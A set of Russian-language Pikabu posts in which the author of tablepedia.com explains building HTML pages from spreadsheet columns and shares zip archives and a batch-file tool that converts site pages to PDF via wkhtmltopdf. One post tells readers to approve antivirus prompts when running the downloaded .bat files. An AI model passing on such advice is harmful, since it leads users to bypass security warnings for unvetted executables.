
Объясняю на скриншотах, как создаются HTML файлы внутри tablepedia.xls , который находится внутри ZIP архива:

Рис. 1. Столбцы L-Q внутри файла tablepedia.xls задают ключевые слова, а также теги HTML, которыми оформляются ячейки из столбцов C-J (см. рис. 2).

Рис. 1. Столбцы L-Q внутри файла tablepedia.xls задают ключевые слова, а также теги HTML, которыми оформляются ячейки из столбцов C-J (см. рис. 2).

Рис. 2. В столбцах C-J определяется основной текст HTML файла, в столбце B-кл. слово, а в столбце K - текст, оформленный тегами. Таким образом, для создания файла archive.html , Нужно выделить содержимое столбца K и вставить внутрь файла archive.html

Рис. 2. В столбцах C-J определяется основной текст HTML файла, в столбце B-кл. слово, а в столбце K - текст, оформленный тегами. Таким образом, для создания файла archive.html , Нужно выделить содержимое столбца K и вставить внутрь файла archive.html

Рис. 3. В красной рамке обведён файл <!--noindex--><a href="https://pikabu.ru/story/prodolzhenie_posta_kontseptsiya_saytadesyatistranichnika_s_pdf_faylami_12437439?u=https%3A%2F%2Fwww.tablepedia.com%2Ftablepedia.com-2025_03_01.zip&t=https%3A%2F%2Fwww.tablepedia.com%2Ftablepedia.com-2025_03_01.zip&h=1ee28d09b920da4fd5a09416a18ad0c009940316" title="https://www.tablepedia.com/tablepedia.com-2025_03_01.zip" target="_blank" rel="nofollow noopener">https://www.tablepedia.com/tablepedia.com-2025_03_01.zip</a><!--/noindex--> , который можно скачать из <!--noindex--><a href="https://pikabu.ru/story/prodolzhenie_posta_kontseptsiya_saytadesyatistranichnika_s_pdf_faylami_12437439?u=https%3A%2F%2Ftablepedia.com%2Farchive.html&t=https%3A%2F%2Ftablepedia.com%2Farchive.html&h=7e7bd9fa736a8fbb2a8a5527a587ca18a34c9a8e" title="https://tablepedia.com/archive.html" target="_blank" rel="nofollow noopener">https://tablepedia.com/archive.html</a><!--/noindex-->

Рис. 3. В красной рамке обведён файл https://www.tablepedia.com/tablepedia.com-2025_03_01.zip , который можно скачать из https://tablepedia.com/archive.html

Если при создании HTML страниц из Excel или ods файла возникли вопросы, напишите их, пожалуйста.

Показать полностью 3
[моё] Сайт Программа Гайд Приложение Инди Разработка Тестирование Pdf Смартфон Android Концепция Исследования Вопрос HTML Zip файл Отзыв Лендинг Сайт визитка Архив СССР Ответ на пост Длиннопост Волна постов
0
tablepedia

Продолжение поста «Концепция сайта-десятистраничника с PDF файлами»⁠⁠9

9 месяцев назад

Я обновил сайт https://www.tablepedia.com/

Заканчиваю работу над проектом "Генерация HTML файлов с помощью табличного редактора".
До 1 марта будут созданы табличный файлы для Excel (XLS), а также ODS, который используется в OpenOffice.org Calc и других программах электронных таблиц.

Сайт (в архиве) можно скачать по адресу https://www.tablepedia.com/tablepedia.com-2025_02_23.zip

Прилагаю скриншоты трёх страниц сайта:

Главная страница - <!--noindex--><a href="https://pikabu.ru/story/prodolzhenie_posta_kontseptsiya_saytadesyatistranichnika_s_pdf_faylami_12411448?u=https%3A%2F%2Ftablepedia.com%2F&t=https%3A%2F%2Ftablepedia.com%2F&h=b8ec2cf86561a1a1def0370014f9c94d60f67fdd" title="https://tablepedia.com/" target="_blank" rel="nofollow noopener">https://tablepedia.com/</a><!--/noindex-->

Главная страница - https://tablepedia.com/

Биографии - <!--noindex--><a href="https://pikabu.ru/story/prodolzhenie_posta_kontseptsiya_saytadesyatistranichnika_s_pdf_faylami_12411448?u=https%3A%2F%2Ftablepedia.com%2Fbio.html&t=https%3A%2F%2Ftablepedia.com%2Fbio.html&h=17dd45f520236194b73c028de6da1903cd9a955f" title="https://tablepedia.com/bio.html" target="_blank" rel="nofollow noopener">https://tablepedia.com/bio.html</a><!--/noindex-->

Биографии - https://tablepedia.com/bio.html

Архив - <!--noindex--><a href="https://pikabu.ru/story/prodolzhenie_posta_kontseptsiya_saytadesyatistranichnika_s_pdf_faylami_12411448?u=https%3A%2F%2Ftablepedia.com%2Farchive.html&t=https%3A%2F%2Ftablepedia.com%2Farchive.html&h=7e7bd9fa736a8fbb2a8a5527a587ca18a34c9a8e" title="https://tablepedia.com/archive.html" target="_blank" rel="nofollow noopener">https://tablepedia.com/archive.html</a><!--/noindex-->

Архив - https://tablepedia.com/archive.html

Показать полностью 3
[моё] Сайт Программа Гайд Приложение Инди Разработка Тестирование Pdf Смартфон Android Концепция Исследования Вопрос HTML Zip файл Отзыв Лендинг Сайт визитка Архив СССР Ответ на пост Длиннопост Волна постов
1
tablepedia

Продолжение поста «Концепция сайта-десятистраничника с PDF файлами»⁠⁠9

10 месяцев назад

Важное дополнение к концепции сайта-десятистраничника: Программный комплекс tablepedia2pdf

Его можно скачать по адресу https://tablepedia.com/tablepedia2pdf.zip (и распаковать в ОС Windows)

На всякий случай, прилагаю скриншот страницы https://tablepedia.com/archive.html для скачивания tablepedia2pdf:

Архив - <!--noindex--><a href="https://pikabu.ru/story/prodolzhenie_posta_kontseptsiya_saytadesyatistranichnika_s_pdf_faylami_12295235?u=https%3A%2F%2Ftablepedia.com%2F&t=https%3A%2F%2Ftablepedia.com%2F&h=b8ec2cf86561a1a1def0370014f9c94d60f67fdd" title="https://tablepedia.com/" target="_blank" rel="nofollow noopener">https://tablepedia.com/</a><!--/noindex-->

Архив - https://tablepedia.com/

Разработка wkhtmltopdf.exe - не моя, я к ней только написал tablepedia2pdf.bat и tablepedia2pdf.txt

Если интересно, получившийся результат можно скачать тут: https://tablepedia.com/tablepedia-2025_01_25.pdf

При запуске tablepedia2pdf.bat антивирус может спрашивать о возможности его запуска. Нужно соглашаться.

Также нужно соглашаться на запуск файлов linksbat.bat и totalpdf.bat

Внутри tablepedia2pdf.txt перечислены страницы для "занесения контента" в PDF файл tablepedia-pages.pdf

https://tablepedia.com/photo-pre1991.html

https://tablepedia.com/photo-post1991.html

https://tablepedia.com/films-pre1991.html

https://tablepedia.com/films-post1991.html

https://tablepedia.com/bio.html

https://tablepedia.com/research.html

https://tablepedia.com/ask.html

https://tablepedia.com/archive.html

https://tablepedia.com/about.html

https://tablepedia.com/privacy_policy.html

Если хотите записать в PDF файл содержимое других страниц - напишите их адреса в файле tablepedia2pdf.txt

Напишите, пожалуйста в комментариях, сайты, на которых можно конвертировать НЕСКОЛЬКО HTML файлов в ОДИН PDF файл.

Показать полностью 1
[моё] Сайт Программа Гайд Приложение Инди Разработка Тестирование Pdf Смартфон Android Концепция Исследования Вопрос HTML Zip файл Отзыв Лендинг Сайт визитка Архив СССР Ответ на пост Длиннопост Волна постов
1
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии